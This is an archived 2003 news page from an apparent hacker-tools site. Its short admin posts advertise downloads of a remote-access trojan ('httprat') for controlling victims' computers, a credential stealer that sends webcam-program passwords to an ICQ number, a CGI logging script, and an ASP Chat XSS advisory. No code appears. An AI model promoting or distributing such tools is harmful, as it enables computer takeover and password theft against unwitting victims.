
by admin

Sunday, June 29th, 2003 at 9:40 am

Posted by: morning_wood
NEW !!! cgi logging script with illwill’s cgi notifer. New features and a XSS vunerability fix ( discovered by me in nilez old script affecting all prior versions ) So get the new version here. A stand alone version coming soon…

httprat .2

by admin

Sunday, June 22nd, 2003 at 7:19 pm

talked with zombie through an email and offered to host a download of his newest trojan httprat since his website is extremely slow.. basically what it is ,is it’s a http server that allows you to control the remote computer through a webrowser…you can view/kill processes
browse/download/execute/delete files close firewalls b4 notifies you by email with the victims ip and allows you to use more than one SMTP server to notify you just in case your smtp goes down etc.. and its only 29kb you can get it ::HERE::


by admin

Saturday, June 21st, 2003 at 9:31 pm … a little program that gets the username and password from the registry and sends the info to your icq number… i guess morning_wood found out a lot of cam program put the password in the registry plaintext so ill prolly release some other ones for other cam programs.. if you know of a camprogram you want to get the pass of email me and ill send you a program to get the pass.. blah blah blah… heres the write up of his advisory

0day – Exploit

by admin

Tuesday, June 17th, 2003 at 11:32 am

Posted by: morning_wood
Asp Chat – XSS / JS Injection
aspchat.txt got w00d?


by admin

Tuesday, June 17th, 2003 at 5:37 am

well since we’re finally online i guess this week when i get time ill try t upload some new tools and shit… i have a shitload of stuff to ad maybe ill start it off with just a directory full of shit then ill add descriptions of the tool in the files.html when i get a little more time..


by admin

Wednesday, June 4th, 2003 at 2:42 am

been busy working and with the new gf so im barely on anymore except to check email etc.. hopefully can get some time soon to update and make some new shit

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